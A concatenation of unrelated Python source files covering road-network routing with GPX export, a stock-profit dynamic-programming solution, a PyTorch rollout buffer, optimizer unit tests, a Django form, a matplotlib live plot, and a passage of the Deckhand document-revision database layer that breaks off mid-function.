def __get_one_to_one_routing(self, start_node, end_node, end_speed=10.0):
"""Get one-to-one shorest path using A* algorithm.
Args:
start_node and end_node: PgrNode.
end_speed: speed from node to nearest vertex on way (unit: km/h)
Returns:
Routing dict with key (start_node, end_node), and path and cost
in values. Cost is travelling time in second.
"""
if start_node == end_node:
return {}
end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
vertices = self.__find_nearest_vertices([start_node, end_node])
node_vertex_costs = [
self.__node_distance(start_node, vertices[0])/end_speed,
self.__node_distance(end_node, vertices[1])/end_speed
]
# routing between vertices
main_routing = self.astar(vertices[0].id, vertices[1].id)
routing = {(start_node, end_node) : {
'cost':
main_routing[(vertices[0].id, vertices[1].id)]['cost'] +
node_vertex_costs[0] +
node_vertex_costs[1],
'path':
[start_node] +
main_routing[(vertices[0].id, vertices[1].id)]['path'] +
[end_node] }
}
return routing
def __get_all_pairs_routings(self, start_nodes, end_nodes=None, end_speed=10.0):
"""Get all-pairs shortest paths from start_nodes to end_nodes with costs
using Dijkstra algorithm.
Args:
start_nodes and end_nodes: lists of PgrNode.
end_speed: speed from node to nearest vertex on way (unit: km/h)
Returns:
A dict with key (start_node, end_node), and path and cost in
values. Cost is travelling time with unit second.
"""
end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
if end_nodes is not None:
node_set = set(start_nodes) | set(end_nodes)
else:
node_set = set(start_nodes)
end_nodes = start_nodes
node_list = list(node_set)
vertices = self.__find_nearest_vertices(node_list)
node_vertex = {node: {'vertex': vertex,
'cost': self.__node_distance(node, vertex)/end_speed}
for node, vertex in zip(node_list, vertices)}
start_vids = [node_vertex[node]['vertex'].id for node in start_nodes]
end_vids = [node_vertex[node]['vertex'].id for node in end_nodes]
# routings from vertices to vertices on ways
main_routings = self.dijkstra(start_vids, end_vids)
routings = {(start_node, end_node) : {
'cost':
main_routings[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)]['cost'] +
node_vertex[start_node]['cost'] +
node_vertex[end_node]['cost'],
'path':
[start_node] +
main_routings[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)]['path'] +
[end_node] }
for start_node in start_nodes
for end_node in end_nodes
if start_node != end_node}
return routings
def __get_all_pairs_costs(self, start_nodes, end_nodes=None, end_speed=10.0):
"""Get all-pairs shortest paths' costs without path details.
Args:
start_nodes and end_nodes: lists of PgrNode. end_nodes is None means
it is the same as start_nodes.
end_speed: speed from node to nearest vertex on way (unit: km/h).
Returns:
A dict with key (start_node, end_node), and values cost. Cost is
travelling time in second.
"""
end_speed = end_speed*1000.0/3600.0 # km/h -> m/s
if end_nodes is not None:
node_set = set(start_nodes) | set(end_nodes)
else:
node_set = set(start_nodes)
end_nodes = start_nodes
node_list = list(node_set)
vertices = self.__find_nearest_vertices(node_list)
node_vertex = {node: {'vertex': vertex,
'cost': self.__node_distance(node, vertex) / end_speed}
for node, vertex in zip(node_list, vertices)}
start_vids = [node_vertex[node]['vertex'].id for node in start_nodes]
end_vids = [node_vertex[node]['vertex'].id for node in end_nodes]
# routings' costs from vertices to vertices on ways
main_costs = self.dijkstra_cost(start_vids, end_vids)
# total costs = main cost + two ends costs
costs = {(start_node, end_node) :
main_costs[(node_vertex[start_node]['vertex'].id, node_vertex[end_node]['vertex'].id)] +
node_vertex[start_node]['cost'] +
node_vertex[end_node]['cost']
for start_node in start_nodes
for end_node in end_nodes
if start_node != end_node}
return costs
def get_routes(self, start_nodes, end_nodes, end_speed=10.0, gpx_file=None):
"""Get shortest paths from nodes to nodes.
Args:
start_nodes: PgrNode list for many nodes, or PgrNode for one node.
end_nodes: PgrNode list for many nodes, or PgrNode for one node.
end_speed: speed for travelling from end node to corresponding
nearest node on the way.
gpx_file: name of file for saving the paths as gpx format.
Returns:
A dict mapping node pair (start_node, end_node) to dict of
corresponding path and cost. Path is a Pgrnode list, and cost is
travelling time in second.
"""
if not isinstance(start_nodes, list):
start_nodes = [start_nodes]
if not isinstance(end_nodes, list):
end_nodes = [end_nodes]
routes = {}
# many-to-one or one-to-one
if len(end_nodes) == 1:
for start_node in start_nodes:
r = self.__get_one_to_one_routing(start_node,
end_nodes[0],
end_speed)
routes.update(r)
# one-to-many or many-to-many
else:
routes = self.__get_all_pairs_routings(start_nodes,
end_nodes,
end_speed)
if gpx_file is not None:
self.get_gpx(routes, gpx_file)
return routes
def get_costs(self, start_nodes, end_nodes, end_speed=10.0):
"""Get costs from nodes to nodes without paths.
Args:
start_nodes: PgrNode list for many nodes, or PgrNode for one node.
end_nodes: PgrNode list for many nodes, or PgrNode for one node.
end_speed: speed for travelling from end node to corresponding
nearest node on the way.
Returns:
A dict mapping all node pairs (start_node, end_node) to
corresponding costs. Cost is travelling time in second.
"""
if not isinstance(start_nodes, list):
start_nodes = [start_nodes]
if not isinstance(end_nodes, list):
end_nodes = [end_nodes]
output = {}
# many-to-one or one-to-one
if len(end_nodes) == 1:
for start_node in start_nodes:
routing = self.__get_one_to_one_routing(start_node, end_nodes[0], end_speed)
for k, v in routing.items():
output.update({k: v['cost']})
return output
return self.__get_all_pairs_costs(start_nodes, end_nodes, end_speed)
def get_gpx(self, routes, gpx_file=None):
"""Get gpx representation of routes.
Args:
routes: routes returned by get_routes.
gpx_file: name of file for saving gpx data.
Returns:
gpx string of paths in routes. Saved in gpx_file if it is specified.
"""
output = ''
output = output + "<?xml version='1.0'?>\n"
output = output + ("<gpx version='1.1' creator='psycopgr' "
"xmlns='http://www.topografix.com/GPX/1/1' "
"xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' "
"xsi:schemaLocation='http://www.topografix.com/GPX/1/1 "
"http://www.topografix.com/GPX/1/1/gpx.xsd'>\n")
for key, value in routes.items():
output = output + " <trk>\n"
output = output + " <name>{},{}->{},{}: {}</name>\n".format(
key[0].lon,
key[0].lat,
key[1].lon,
key[1].lat,
value.get('cost', None))
output = output + " <trkseg>\n"
for node in value['path']:
# print(node)
output = output + " <trkpt lat='{}' lon='{}'>\n".format(
node.lat,
node.lon)
output = output + " </trkpt>\n"
output = output + " </trkseg>\n </trk>\n"
output = output + "</gpx>\n"
if gpx_file is not None:
with open(gpx_file, "w") as f:
f.write(output)
print("gpx saved to {}".format(gpx_file))
return output
def test1():
pgr = PGRouting(database='pgroutingtest', user='herrk')
pgr.set_meta_data(table='edge_table', id='id', cost='cost')
costs = pgr.dijkstra_cost([2, 11], [3, 5])
print("\nall-pairs costs:\n")
print(costs)
routings = pgr.dijkstra([2, 11], [3, 5])
print("\nall-pairs paths with costs:\n")
print(routings)
routing = pgr.astar(11, 3)
print("\none-to-one path:\n")
print(routing)
def test2():
pgr = PGRouting(database='mydb', user='herrk')
routing = pgr.astar(100, 111)
print("\nrouting:\n")
print(routing)
routings = pgr.dijkstra([100, 400], [200, 600])
print("\nroutings:\n")
print(routings)
gpx = pgr.get_gpx(routings, 'b.gpx')
print(gpx)
def test5():
pgr = PGRouting(database='mydb', user='herrk')
nodes = [PgrNode(None, 116.30150, 40.05500),
PgrNode(None, 116.36577, 40.00253),
PgrNode(None, 116.30560, 39.95458),
PgrNode(None, 116.46806, 39.99857)]
routings = pgr.get_routes(nodes, nodes)
# pprint(routings)
costs = pgr.get_costs(nodes, nodes)
# pprint(costs)
keys = [(s, t) for s in nodes for t in nodes if s != t]
for s, t in keys:
r = pgr.get_routes(s, t)
c = pgr.get_costs(s, t)
print("\ncompare")
print(routings[(s, t)]['cost'])
print(costs[(s, t)])
print(r[(s,t)]['cost'])
print(c[(s,t)])
s = nodes[0]
t = nodes[3]
r = pgr.get_routes(s, t, gpx_file='test/r-astar.gpx')
c = pgr.get_costs(s, t)
print(r[(s, t)]['cost'])
print(c[(s, t)])
pgr.get_gpx({(s, t): routings[(s, t)]}, gpx_file='test/r-dijkstra.gpx')
def main():
test5()
if __name__ == '__main__':
main()
|
class Analysis:
def __init__(self):
self.status = "New"
self.minEditDistance = 0
self.deviationFromMean = 0
def setQueryKey(self, queryKey):
self.queryKey = queryKey
def getQueryKey(self):
return self.queryKey
def setQueryValue(self, queryValue):
self.queryValue = queryValue
def getQueryValue(self):
return self.queryValue
def setQueryID(self, queryID):
self.queryID = queryID
def getQueryID(self):
return self.queryID
def setScore(self, score):
self.score = score
def getScore(self):
return self.score
def setExplanation(self, explanation):
self.explanation = explanation
def getExplanation(self):
return self.explanation
def setProbability(self, probability):
self.probability = probability
def getProbability(self):
return self.probability
def setSuggestion(self, suggestion):
self.suggestion = suggestion
def getSuggestion(self):
return self.suggestion
def setMinEditDistance(self, minEditDistance):
self.minEditDistance = minEditDistance
def getMinEditDistance(self):
return self.minEditDistance
def setDeviationFromMean(self, deviationFromMean):
self.deviationFromMean = deviationFromMean
def getDeviationFromMean(self):
return self.deviationFromMean
def setStatus(self, status):
self.status = status
def getStatus(self):
return self.status |
class Solution:
"""
@param prices: a list of integers
@return: return a integer
"""
def maxProfit(self, A):
n = len(A)
f = [[-sys.maxsize] * 2 for _ in range(n+1)]
f[0][0] = 0
for i in range(1, n+1):
# continue without stock
f[i][0] = max(f[i][0], f[i-1][0])
# sell today
if i > 1:
f[i][0] = max(f[i][0], f[i-1][1] + A[i-1]-A[i-2])
if i > 1:
# continue with stock
f[i][1] = max(f[i][1], f[i-1][1] + A[i-1]-A[i-2])
if i > 1:
# buy today
f[i][1] = max(f[i][1], f[i-2][0])
if i == 1:
# special case, the first "buy" doesn't need cooldown
f[i][1] = max(f[i][1], f[i-1][0])
return f[n][0]
"""
无限多次,只需要两个数组分别记录有股票和没有股票即可。一个特例:第一次买不需要cooldown
1. zhuang tai:
2. fang cheng: f[i][0] = max(f[i-1][0],
f[i-1][1] + Pi-1 - Pi-2)
f[i][1] = max(f[i-1][1] + Pi-1 - Pi-2 ,
f[i-2][0])
3. chu shi: f[0][0] = 0
f[0][1] = -inf
4. da an: f[0][n]
""" |
import torch
class RolloutStorage(object):
def __init__(self, nsteps, num_processes, obs_shape, action_space):
self.obs = torch.zeros(nsteps + 1, num_processes, *obs_shape)
self.rewards = torch.zeros(nsteps, num_processes, 1)
self.value_preds = torch.zeros(nsteps, num_processes, 1)
self.returns = torch.zeros(nsteps + 1, num_processes, 1)
self.action_log_probs = torch.zeros(nsteps, num_processes, 1)
self.actions = torch.zeros(nsteps, num_processes, 1)
self.masks = torch.ones(nsteps + 1, num_processes, 1)
self.nsteps = nsteps
self.step = 0
def insert(self, obs, actions, action_log_probs,
value_preds, rewards, masks):
self.obs[self.step + 1].copy_(obs)
self.actions[self.step].copy_(actions)
self.action_log_probs[self.step].copy_(action_log_probs)
self.value_preds[self.step].copy_(value_preds)
self.rewards[self.step].copy_(rewards)
self.masks[self.step + 1].copy_(masks)
self.step = (self.step + 1) % self.nsteps
def after_update(self):
self.obs[0].copy_(self.obs[-1])
self.masks[0].copy_(self.masks[-1])
def compute_returns(self, next_value, gamma):
self.returns[-1] = next_value
for step in reversed(range(self.rewards.size(0))):
self.returns[step] = self.returns[step + 1] * gamma * self.masks[step + 1] + self.rewards[step]
def feed_forward_generator(self, advantages):
raise NotImplementedError
|
'''
exceptions.py: exceptions defined by Martian
Authors
-------
Michael Hucka <mhucka@caltech.edu> -- Caltech Library
Copyright
---------
Copyright (c) 2019-2021 by the California Institute of Technology. This code
is open-source software released under a 3-clause BSD license. Please see the
file "LICENSE" for more information.
'''
class UserCancelled(Exception):
'''The user elected to cancel/quit the program.'''
pass
class ServiceFailure(Exception):
'''Unrecoverable problem involving network services.'''
pass
class NoContent(Exception):
'''Server returned a code 401 or 404, indicating no content found.'''
class RateLimitExceeded(Exception):
'''The service flagged reports that its rate limits have been exceeded.'''
pass
class InternalError(Exception):
'''Unrecoverable problem involving Martian itself.'''
pass
class RequestError(Exception):
'''Problem with the TIND query or request.'''
pass
|
import os
import random
import sys
import time
import unittest
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
from codes.problem import Problem
class MockProblem(Problem):
def __init__(self):
super().__init__(self, 4)
self.MIN_VAL = 0
self.MAX_VAL = 1
def init(self):
pass
def eval(self, np_arr):
np_arr = np.round(np_arr) # 2値化
return np_arr.sum()
def view(self, np_arr):
pass
from codes.algorithms.ABC import ABC
from codes.algorithms.Bat import Bat
from codes.algorithms.Cuckoo import Cuckoo
from codes.algorithms.Cuckoo_greedy import Cuckoo_greedy
from codes.algorithms.DE import DE
from codes.algorithms.Firefly import Firefly
from codes.algorithms.GA import GA
from codes.algorithms.GA_BLXa import GA_BLXa
from codes.algorithms.GA_SPX import GA_SPX
from codes.algorithms.Harmony import Harmony
from codes.algorithms.PfGA import PfGA
from codes.algorithms.PSO import PSO
from codes.algorithms.Tabu import Tabu
from codes.algorithms.WOA import WOA
class Test(unittest.TestCase):
def test_1(self):
test_patterns = [
ABC(10),
Bat(10),
Cuckoo(10),
Cuckoo_greedy(10),
DE(10),
Firefly(10),
GA(10),
PfGA(),
Harmony(10),
PSO(10),
WOA(10),
GA_BLXa(10),
GA_SPX(10),
Tabu(10),
]
for o in test_patterns:
with self.subTest(alg=o):
o.init(MockProblem())
for _ in range(100):
o.step()
self.assertTrue(o.count >= 10)
self.assertEqual(o.getMaxScore(), 4)
if __name__ == "__main__":
unittest.main()
|
from django import forms
from django.forms import ModelForm
from cliente.models import Cliente
class RegisterCliente(forms.ModelForm):
class Meta():
model=Cliente
fields=["nombre","apellido_paterno","apellido_materno","correo","telefono","fecha_instalacion","is_activo","departamento","puntoenlace","user"]
|
import matplotlib.pyplot as plt
# TODO: Would be nice to be able to have an alternative graphing which would
# just draw all of the data at the end when final_update is called - more
# efficient version! And to be able to handle inline graphing solution
class DynamicGraph():
"""
Simple utility to allow updating a graph as the values to the graph change over time
- changing the number of data points, or their values.
Parameters
------
graph_title
If provided, will be used as the title for the plot
xlabel
Optional label for the x-axis
ylabel
Optional label for the y-axis
Notes
------
If the graph becomes overlaid by later figures, make sure to use plt.figure()
before calling any other plt functions.
WARNING
--------
When adding new elements, the data will be duplicated so it can get quite slow with huge arrays.
Best to not graph every point, but only every few points
"""
def __init__(self, graph_title=None, xlabel=None, ylabel=None):
plt.ion()
#Set up plot
self.figure, self.ax = plt.subplots()
self.lines, = self.ax.plot([],[], 'o', markersize=3)
if graph_title is not None:
self.ax.set_title(graph_title)
if xlabel is not None:
self.ax.set_xlabel(xlabel)
if ylabel is not None:
self.ax.set_ylabel(ylabel)
#Autoscale on unknown axis and known lims on the other
self.ax.set_autoscaley_on(True)
self.ax.set_autoscalex_on(True)
self.ax.grid()
# Now check to see if it has the wanted functionality.
try:
self.figure.canvas.flush_events()
except NotImplementedError as e:
raise NotImplementedError("Warning, you are using an inline graphing solution, so this approach will not work.", )
print()
def redraw(self, xdata, ydata):
"""
Regenerate the graph using the new data. Will rescale the axis as necessary.
Parameters
------
xdata : array-like, shape [n_samples]
x-data values for ALL of the wanted data points
ydata : array-like, shape [n_samples]
y-data values for ALL of the wanted data points
"""
#Update data (with the new _and_ the old points)
self.lines.set_xdata(xdata)
self.lines.set_ydata(ydata)
#Need both of these in order to rescale
self.ax.relim()
self.ax.autoscale_view()
#We need to draw *and* flush
self.figure.canvas.draw()
self.figure.canvas.flush_events()
def final_update(self, xdata, ydata):
print("Note: If the graph becomes covered by later plots, please use plt.figure() first")
self.redraw(xdata, ydata)
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines interface for DB access."""
import copy
import functools
import hashlib
import threading
from oslo_config import cfg
from oslo_db import exception as db_exception
from oslo_db import options
from oslo_db.sqlalchemy import session
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import sqlalchemy.orm as sa_orm
from sqlalchemy import text
from deckhand.common import utils
from deckhand.db.sqlalchemy import models
from deckhand.engine import utils as eng_utils
from deckhand import errors
from deckhand import types
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
options.set_defaults(CONF)
_FACADE = None
_LOCK = threading.Lock()
def _create_facade_lazily():
global _LOCK, _FACADE
if _FACADE is None:
with _LOCK:
if _FACADE is None:
_FACADE = session.EngineFacade.from_config(
CONF, sqlite_fk=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(autocommit=True, expire_on_commit=False):
facade = _create_facade_lazily()
return facade.get_session(autocommit=autocommit,
expire_on_commit=expire_on_commit)
def drop_db():
models.unregister_models(get_engine())
def setup_db(connection_string, create_tables=False):
models.register_models(get_engine(), connection_string)
if create_tables:
models.create_tables(get_engine())
def raw_query(query, **kwargs):
"""Execute a raw query against the database."""
# Cast all the strings that represent integers to integers because type
# matters when using ``bindparams``.
for key, val in kwargs.items():
if key.endswith('_id'):
try:
val = int(val)
kwargs[key] = val
except ValueError:
pass
stmt = text(query)
stmt = stmt.bindparams(**kwargs)
return get_engine().execute(stmt)
def require_unique_document_schema(schema=None):
"""Decorator to enforce only one singleton document exists in the system.
An example of a singleton document is a ``LayeringPolicy`` document.
Only one singleton document can exist within the system at any time. It is
an error to attempt to insert a new document with the same ``schema`` if it
has a different ``metadata.name`` than the existing document.
A singleton document that already exists can be updated, if the document
that is passed in has the same name/schema as the existing one.
The existing singleton document can be replaced by first deleting it
and only then creating a new one.
:raises SingletonDocumentConflict: if a singleton document in the system
already exists and any of the documents to be created has the same
``schema`` but has a ``metadata.name`` that differs from the one
already registered.
"""
def decorator(f):
if schema not in types.DOCUMENT_SCHEMA_TYPES:
raise errors.DeckhandException(
'Unrecognized document schema %s.' % schema)
@functools.wraps(f)
def wrapper(bucket_name, documents, *args, **kwargs):
existing_documents = revision_documents_get(
schema=schema, deleted=False, include_history=False)
existing_document_names = [
eng_utils.meta(x) for x in existing_documents
]
conflicting_names = [
eng_utils.meta(x) for x in documents
if eng_utils.meta(x) not in existing_document_names and
x['schema'].startswith(schema)
]
if existing_document_names and conflicting_names:
raise errors.SingletonDocumentConflict(
schema=existing_document_names[0][0],
layer=existing_document_names[0][1],
name=existing_document_names[0][2],
conflict=', '.join(["[%s, %s] %s" % (x[0], x[1], x[2])
for x in conflicting_names]))
return f(bucket_name, documents, *args, **kwargs)
return wrapper
return decorator
@require_unique_document_schema(types.LAYERING_POLICY_SCHEMA)
def documents_create(bucket_name, documents, session=None):
"""Create a set of documents and associated bucket.
If no changes are detected, a new revision will not be created. This
allows services to periodically re-register their schemas without
creating unnecessary revisions.
:param bucket_name: The name of the bucket with which to associate created
documents.
:param documents: List of documents to be created.
:param session: Database session object.
:returns: List of created documents in dictionary format.
:raises DocumentExists: If the document already exists in the DB for any
bucket.
"""
session = session or get_session()
resp = []
with session.begin():
documents_to_create = _documents_create(bucket_name, documents,
session=session)
# The documents to be deleted are computed by comparing the documents
# for the previous revision (if it exists) that belong to `bucket_name`
# with `documents`: the difference between the former and the latter.
document_history = [
d for d in revision_documents_get(bucket_name=bucket_name,
session=session)
]
documents_to_delete = [
h for h in document_history if eng_utils.meta(h) not in [
eng_utils.meta(d) for d in documents]
]
# Only create a revision if any docs have been created, changed or
# deleted.
if any([documents_to_create, documents_to_delete]):
revision = revision_create(session=session)
bucket = bucket_get_or_create(bucket_name, session=session)
if documents_to_delete:
LOG.debug('Deleting documents: %s.',
[eng_utils.meta(d) for d in documents_to_delete])
deleted_documents = []
for d in documents_to_delete:
doc = document_delete(d, revision['id'], bucket,
session=session)
deleted_documents.append(doc)
resp.append(doc)
if documents_to_create:
LOG.debug(
'Creating documents: %s.', [
(d['schema'], d['layer'], d['name'])
for d in documents_to_create
]
)
for doc in documents_to_create:
doc['bucket_id'] = bucket['id']
doc['revision_id'] = revision['id']
if not doc.get('orig_revision_id'):
doc['orig_revision_id'] = doc['revision_id']
try:
doc.save(session=session)
except db_exception.DBDuplicateEntry:
raise errors.DuplicateDocumentExists(
schema=doc['schema'], layer=doc['layer'],
name=doc['name'], bucket=bucket['name'])
resp.append(doc.to_dict())
# NOTE(fmontei): The orig_revision_id is not copied into the
# revision_id for each created document, because the revision_id here
# should reference the just-created revision. In case the user needs
# the original revision_id, that is returned as well.
return resp
def document_delete(document, revision_id, bucket, session=None):
"""Delete a document
Creates a new document with the bare minimum information about the document
that is to be deleted, and then sets the appropriate deleted fields
:param document: document object/dict to be deleted
:param revision_id: id of the revision where the document is to be deleted
:param bucket: bucket object/dict where the document will be deleted from
:param session: Database session object.
:return: dict representation of deleted document
"""
session = session or get_session()
doc = models.Document()
# Store bare minimum information about the document.
doc['schema'] = document['schema']
doc['name'] = document['name']
doc['layer'] = document['layer']
doc['data'] = {}
doc['meta'] = document['metadata']
doc['data_hash'] = _make_hash({})
doc['metadata_hash'] = _make_hash({})
doc['bucket_id'] = bucket['id']
doc['revision_id'] = revision_id
# Save and mark the document as `deleted` in the database.
try:
doc.save(session=session)
except db_exception.DBDuplicateEntry:
raise errors.DuplicateDocumentExists(
schema=doc['schema'], layer=doc['layer'],
name=doc['name'], bucket=bucket['name'])
doc.safe_delete(session=session)
return doc.to_dict()
def documents_delete_from_buckets_list(bucket_names, session=None):
"""Delete all documents in the provided list of buckets
:param bucket_names: list of bucket names for which the associated
buckets and their documents need to be deleted.
:param session: Database session object.
:returns: A new model.Revisions object after all the documents have been
deleted.
"""
session = session or get_session()
with session.begin():
# Create a new revision
revision = models.Revision()
revision.save(session=session)
for bucket_name in bucket_names:
documents_to_delete = [
d for d in revision_documents_get(bucket_name=bucket_name,
session=session)
if "deleted" not in d or not d['deleted']
]
bucket = bucket_get_or_create(bucket_name, session=session)
if documents_to_delete:
LOG.debug('Deleting documents: %s.',
[eng_utils.meta(d) for d in documents_to_delete])
for document in documents_to_delete:
document_delete(document, revision['id'], bucket,
session=session)
return revision
def _documents_create(bucket_name, documents, session=None):
documents = copy.deepcopy(documents)
session = session or get_session()
filters = ('name', 'schema', 'layer')
changed_documents = []
def _document_create(document):
model = models.Document()
model.update(document)
return model
for document in documents:
document.setdefault('data', {})
document = _fill_in_metadata_defaults(document)
# Hash the document's metadata and data to later efficiently check
# whether those data have changed.
document['data_hash'] = _make_hash(document['data'])
document['metadata_hash'] = _make_hash(document['meta'])
try:
existing_document = document_get(
raw_dict=True, deleted=False, revision_id='latest',
**{x: document[x] for x in filters})
except errors.DocumentNotFound:
# Ignore bad data at this point. Allow creation to bubble up the
# error related to bad data.
existing_document = None
if existing_document:
# If the document already exists in another bucket, raise an error.
if existing_document['bucket_name'] != bucket_name:
raise errors.DuplicateDocumentExists(
schema=existing_document['schema'],
name=existing_document['name'],
layer=existing_document['layer'],
bucket=existing_document['bucket_name'])
# By this point we know existing_document and document have the
# same name, schema and layer due to the filters passed to the DB
# query. But still want to check whether the document is precisely
# the same one by comparing metadata/data hashes.
if (existing_document['data_hash'] == document['data_hash'] and
existing_document['metadata_hash'] == document[
'metadata_hash']):
# Since the document has not changed, reference the original
# revision in which it was created. This is necessary so that
# the correct revision history is maintained.
if existing_document['orig_revision_id']:
document['orig_revision_id'] = existing_document[
'orig_revision_id']
else:
document['orig_revision_id'] = existing_document[
'revision_id']
# Create all documents, even unchanged ones, for the current revision. This
# makes the generation of the revision diff a lot easier.
for document in documents:
doc = _document_create(document)
changed_documents.append(doc)
return changed_documents
def _fill_in_metadata_defaults(document):
document['meta'] = document.pop('metadata')
document['name'] = document['meta']['name']
if not document['meta'].get('storagePolicy', None):
document['meta']['storagePolicy'] = 'cleartext'
document['meta'].setdefault('layeringDefinition', {})
document['layer'] = document['meta']['layeringDefinition'].get('layer')
if 'abstract' not in document['meta']['layeringDefinition']:
document['meta']['layeringDefinition']['abstract'] = False
if 'replacement' not in document['meta']:
document['meta']['replacement'] = False
return document
def _make_hash(data):
return hashlib.sha256(
json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
def document_get(session=None, raw_dict=False, revision_id=None, **filters):
"""Retrieve the first document for ``revision_id`` that match ``filters``.
:param session: Database session object.
:param raw_dict: Whether to retrieve the exact way the data is stored in
DB if ``True``, else the way users expect the data.
:param revision_id: The ID corresponding to the ``Revision`` object. If the
it is "latest", then retrieve the latest revision, if one exists.
:param filters: Dictionary attributes (including nested) used to filter
out revision documents.
:returns: Dictionary representation of retrieved document.
:raises: DocumentNotFound if the document wasn't found.
"""
session = session or get_session()
if revision_id == 'latest':
revision = session.query(models.Revision)\
.order_by(models.Revision.created_at.desc())\
.first()
if revision:
filters['revision_id'] = revision.id
elif revision_id:
filters['revision_id'] = revision_id
# TODO(fmontei): Currently Deckhand doesn't support filtering by nested
# JSON fields via sqlalchemy. For now, filter the documents using all
# "regular" filters via sqlalchemy and all nested filters via Python.
nested_filters = {}
for f in filters.copy():
if any([x in f for x in ('.', 'schema')]):
nested_filters.setdefault(f, filters.pop(f))
# Documents with the same metadata.name and schema can exist across
# different revisions, so it is necessary to order documents by creation
# date, then return the first document that matches all desired filters.
documents = session.query(models.Document)\
.filter_by(**filters)\
.order_by(models.Document.created_at.desc())\
.all()
for doc in documents:
d = doc.to_dict(raw_dict=raw_dict)
if utils.deepfilter(d, **nested_filters):
return d
filters.update(nested_filters)
raise errors.DocumentNotFound(filters=filters)
def document_get_all(session=None, raw_dict=False, revision_id=None,
**filters):
"""Retrieve all documents for ``revision_id`` that match ``filters``.
:param session: Database session object.
:param raw_dict: Whether to retrieve the exact way the data is stored in
DB if ``True``, else the way users expect the data.
:param revision_id: The ID corresponding to the ``Revision`` object. If the
it is "latest", then retrieve the latest revision, if one exists.
:param filters: Dictionary attributes (including nested) used to filter
out revision documents.
:returns: Dictionary representation of each retrieved document.
"""
session = session or get_session()
if revision_id == 'latest':
revision = session.query(models.Revision)\
.order_by(models.Revision.created_at.desc())\
.first()
if revision:
filters['revision_id'] = revision.id
elif revision_id:
filters['revision_id'] = revision_id
# TODO(fmontei): Currently Deckhand doesn't support filtering by nested
# JSON fields via sqlalchemy. For now, filter the documents using all
# "regular" filters via sqlalchemy and all nested filters via Python.
nested_filters = {}
for f in filters.copy():
if any([x in f for x in ('.', 'schema')]):
nested_filters.setdefault(f, filters.pop(f))
# Retrieve the most recently created documents for the revision, because
# documents with the same metadata.name and schema can exist across
# different revisions.
documents = session.query(models.Document)\
.filter_by(**filters)\
.order_by(models.Document.created_at.desc())\
.all()
final_documents = []
for doc in documents:
d = doc.to_dict(raw_dict=raw_dict)
if utils.deepfilter(d, **nested_filters):
final_documents.append(d)
return final_documents
####################
def bucket_get_or_create(bucket_name, session=None):
"""Retrieve or create bucket.
Retrieve the ``Bucket`` DB object by ``bucket_name`` if it exists
or else create a new ``Bucket`` DB object by ``bucket_name``.
:param bucket_name: Unique identifier used for creating or retrieving
a bucket.
:param session: Database session object.
:returns: Dictionary representation of created/retrieved bucket.
"""
session = session or get_session()
try:
bucket = session.query(models.Bucket)\
.filter_by(name=bucket_name)\
.one()
except sa_orm.exc.NoResultFound:
bucket = models.Bucket()
bucket.update({'name': bucket_name})
bucket.save(session=session)
return bucket.to_dict()
####################
def bucket_get_all(session=None, **filters):
"""Return list of all buckets.
:param session: Database session object.
:returns: List of dictionary representations of retrieved buckets.
"""
session = session or get_session()
buckets = session.query(models.Bucket)\
.all()
result = []
for bucket in buckets:
revision_dict = bucket.to_dict()
if utils.deepfilter(revision_dict, **filters):
result.append(bucket)
return result
def revision_create(session=None):
"""Create a revision.
:param session: Database session object.
:returns: Dictionary representation of created revision.
"""
session = session or get_session()
revision = models.Revision()
revision.save(session=session)
return revision.to_dict()
def revision_get(revision_id=None, session=None):
"""Return the specified `revision_id`.
:param revision_id: The ID corresponding to the ``Revision`` object.
:param session: Database session object.
:returns: Dictionary representation of retrieved revision.
:raises RevisionNotFound: if the revision was not found.
"""
session = session or get_session()
try:
revision = session.query(models.Revision)\
.filter_by(id=revision_id)\
.one()\
.to_dict()
except sa_orm.exc.NoResultFound:
raise errors.RevisionNotFound(revision_id=revision_id)
revision['documents'] = _update_revision_history(revision['documents'])
return revision
def revision_get_latest(session=None):
"""Return the latest revision.
:param session: Database session object.
:returns: Dictionary representation of latest revision.
"""
session = session or get_session()
latest_revision = session.query(models.Revision)\
.order_by(models.Revision.created_at.desc())\
.first()
if latest_revision:
latest_revision = latest_revision.to_dict()
latest_revision['documents'] = _update_revision_history(
latest_revision['documents'])
else:
# If the latest revision doesn't exist, assume an empty revision
# history and return a dummy revision instead for the purposes of
# revision rollback.
latest_revision = {'documents': [], 'id': 0}
return latest_revision
def require_revision_exists(f):
"""Decorator to require the specified revision to exist.
Requires the wrapped function to use revision_id as the first argument. If
revision_id is not provided, then the check is not performed.
"""
@functools.wraps(f)
def wrapper(revision_id=None, *args, **kwargs):
if revision_id:
revision_get(revision_id)
return f(revision_id, *args, **kwargs)
return wrapper
def _update_revision_history(documents):
# Since documents that are unchanged across revisions need to be saved for
# each revision, we need to ensure that the original revision is shown
# for the document's `revision_id` to maintain the correct revision
# history.
for doc in documents:
if doc['orig_revision_id']:
doc['revision_id'] = doc['orig_revision_id']
return documents
def revision_get_all(session=None, **filters):
"""Return list of all revisions.
:param session: Database session object.
:returns: List of dictionary representations of retrieved revisions.
"""
session = session or get_session()
revisions = session.query(models.Revision)\
.all()
result = []
for revision in revisions:
revision_dict = revision.to_dict()
if utils.deepfilter(revision_dict, **filters):
revision_dict['documents'] = _update_revision_history(
revision_dict['documents'])
result.append(revision_dict)
return result
def revision_delete_all():
"""Delete all revisions and resets primary key index back to 1 for each
table in the database.
.. warning::
Effectively purges all data from database.
:param session: Database session object.
:returns: None
"""
engine = get_engine()
if engine.name == 'postgresql':
